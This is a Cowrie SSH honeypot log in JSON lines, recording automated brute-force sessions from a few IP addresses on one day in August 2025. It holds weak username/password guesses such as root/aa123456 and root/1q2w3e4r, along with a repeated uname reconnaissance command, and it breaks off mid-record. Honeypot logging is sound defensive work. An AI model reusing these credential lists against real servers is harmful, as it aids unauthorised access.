{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:17:42.667301Z","src_ip":"83.168.105.65","session":"a41d6a49a0d0"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-26T12:17:42.777180Z","src_ip":"83.168.105.65","session":"a41d6a49a0d0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:43.815521Z","src_ip":"83.168.105.65","session":"a41d6a49a0d0"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37072,"dst_ip":"1.2.3.4","dst_port":22,"session":"e68ffd39658e","protocol":"ssh","message":"New connection: 83.168.105.65:37072 (1.2.3.4:22) [session: e68ffd39658e]","sensor":"my-vps","timestamp":"2025-08-26T12:17:57.944875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:17:57.945778Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:17:57.982577Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:17:58.099041Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:17:58.230246Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:17:58.230937Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:58.268862Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:17:58.269890Z","src_ip":"83.168.105.65","session":"e68ffd39658e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35094,"dst_ip":"1.2.3.4","dst_port":22,"session":"12f01f1e0c5e","protocol":"ssh","message":"New connection: 212.227.235.229:35094 (1.2.3.4:22) [session: 12f01f1e0c5e]","sensor":"my-vps","timestamp":"2025-08-26T12:18:05.953991Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35308,"dst_ip":"1.2.3.4","dst_port":22,"session":"070834ca1158","protocol":"ssh","message":"New connection: 196.251.86.249:35308 (1.2.3.4:22) [session: 070834ca1158]","sensor":"my-vps","timestamp":"2025-08-26T12:18:06.071410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:06.236680Z","src_ip":"212.227.235.229","session":"12f01f1e0c5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:18:06.237381Z","src_ip":"212.227.235.229","session":"12f01f1e0c5e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:06.597084Z","src_ip":"196.251.86.249","session":"070834ca1158"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:18:06.597808Z","src_ip":"196.251.86.249","session":"070834ca1158"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T12:18:07.908239Z","src_ip":"212.227.235.229","session":"12f01f1e0c5e"}
{"eventid":"cowrie.login.failed","username":"test","password":"password","message":"login attempt [test/password] failed","sensor":"my-vps","timestamp":"2025-08-26T12:18:08.622413Z","src_ip":"196.251.86.249","session":"070834ca1158"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:10.106452Z","src_ip":"212.227.235.229","session":"12f01f1e0c5e"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:10.274256Z","src_ip":"196.251.86.249","session":"070834ca1158"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34638,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d7af4ef2b4a","protocol":"ssh","message":"New connection: 83.168.105.65:34638 (1.2.3.4:22) [session: 2d7af4ef2b4a]","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.385528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.386780Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.422720Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.532744Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:18:13.621553Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.622278Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.659292Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:13.660384Z","src_ip":"83.168.105.65","session":"2d7af4ef2b4a"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54202,"dst_ip":"1.2.3.4","dst_port":22,"session":"c459004b1128","protocol":"ssh","message":"New connection: 83.168.105.65:54202 (1.2.3.4:22) [session: c459004b1128]","sensor":"my-vps","timestamp":"2025-08-26T12:18:28.705934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:28.706597Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:18:28.742908Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:18:28.852478Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:18:28.996820Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:18:28.997626Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:29.036079Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:29.037174Z","src_ip":"83.168.105.65","session":"c459004b1128"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50900,"dst_ip":"1.2.3.4","dst_port":22,"session":"33671082a171","protocol":"ssh","message":"New connection: 212.227.235.229:50900 (1.2.3.4:22) [session: 33671082a171]","sensor":"my-vps","timestamp":"2025-08-26T12:18:40.661303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:40.925246Z","src_ip":"212.227.235.229","session":"33671082a171"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:18:40.925915Z","src_ip":"212.227.235.229","session":"33671082a171"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123123","message":"login attempt [ubuntu/123123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:18:42.702029Z","src_ip":"212.227.235.229","session":"33671082a171"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":45026,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba3f10d0fb73","protocol":"ssh","message":"New connection: 83.168.105.65:45026 (1.2.3.4:22) [session: ba3f10d0fb73]","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.023604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.024519Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.060502Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.169782Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:18:44.262882Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.263647Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.281101Z","src_ip":"212.227.235.229","session":"33671082a171"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.300914Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:18:44.302100Z","src_ip":"83.168.105.65","session":"ba3f10d0fb73"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":57216,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5912d5113b6","protocol":"ssh","message":"New connection: 83.168.105.65:57216 (1.2.3.4:22) [session: f5912d5113b6]","sensor":"my-vps","timestamp":"2025-08-26T12:18:59.655353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:18:59.656403Z","src_ip":"83.168.105.65","session":"f5912d5113b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 